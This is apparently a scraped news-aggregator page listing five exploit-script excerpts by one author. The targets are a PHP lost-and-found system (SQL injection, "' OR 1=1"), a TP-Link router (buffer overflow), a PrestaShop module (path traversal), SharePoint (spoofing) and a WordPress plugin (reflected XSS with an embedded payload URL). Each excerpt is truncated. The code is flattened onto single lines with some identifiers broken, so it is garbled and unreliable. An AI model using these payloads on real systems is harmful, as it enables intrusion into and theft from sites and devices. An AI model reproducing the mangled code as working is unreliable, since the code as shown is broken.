Amirhossein Bahramizadeh News Today : Breaking News, Live Updates & Top Stories | Vimarsana

Stay updated with breaking news from Amirhossein bahramizadeh. Get real-time updates on events, politics, business, and more. Visit us for reliable news and exclusive interviews.

Top News In Amirhossein Bahramizadeh Today - Breaking & Trending Today

Lost And Found Information System 1.0 SQL Injection

# Exploit Title: Lost and Found Information System v1.0 - SQL Injection# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Dork : /php-lfis/admin/?page=system info/contact information# Tested on: Windows/Linux# CVE : CVE-2023-33592import requests# URL of the vulnerable componenturl = "http://example.com/php-lfis/admin/?page=system info/contact information"# Injecting a SQL query to exploit the vulnerabilitypayload = "' OR 1=1 "# Send ....

Amirhossein Bahramizadeh , Exploit Title , Found Information System , Exploit Author ,

TP-Link TL-WR940N 4 Buffer Overflow - KizzMyAnthia.com

# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : hardware# Dork : /userRpm/WanDynamicIpV6CfgRpm# Tested on: Windows/Linux# CVE : CVE-2023-36355import requests# Replace the IP address with the router's IProuter ip = '192.168.0.1'# Construct the URL with the vulnerable endpoint and parameterurl = f'http://{router ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='# Replace the payload with ....

Amirhossein Bahramizadeh , Exploit Title , Exploit Author ,

PrestaShop Winbiz Payment Improper Limitation

# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory# Date: 2023-06-20# Dork: /modules/winbizpayment/downloads/download.php# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html# Version: 17.1.3 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-30198import requestsimport stringimport random# The base URL of the vulnerable sitebase url = "http://example.com"# The ....

Amirhossein Bahramizadeh , Exploit Title , Prestashop Winbiz Payment , Improper Limitation , Exploit Author , Vendor Homepage ,

Microsoft SharePoint Enterprise Server 2016 Spoofing

// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing// Date: 2023-06-20// country: Iran// Exploit Author: Amirhossein Bahramizadeh// Category : Remote// Vendor Homepage:// Microsoft SharePoint Foundation 2013 Service Pack 1// Microsoft SharePoint Server Subscription Edition// Microsoft SharePoint Enterprise Server 2013 Service Pack 1// Microsoft SharePoint Server 2019// Microsoft SharePoint Enterprise Server 2016// Tested on: Windows/Linux// ....

Internetopen Mozilla , Amirhossein Bahramizadeh , Microsoft Sharepoint Foundation , Service Pack , Exploit Title , Microsoft Sharepoint Enterprise Server , Exploit Author , Vendor Homepage , Microsoft Sharepoint Server Subscription , Microsoft Sharepoint Server ,

WordPress Super Socializer 7.13.52 Cross Site Scripting

# Exploit Title: Super Socializer 7.13.52 - Reflected XSS# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the champ sharing count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/super-socializer# Version: 7.13.52 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-2779import requests# The URL of the vulnerable AJAX endpointurl = "https://example.com/wp-admin/admin-ajax.php"# The vulnerable parameter that is not properly sanitized and escapedvulnerable param = ""# ....

Amirhossein Bahramizadeh , Exploit Title , Super Socializer , Exploit Author , Vendor Homepage ,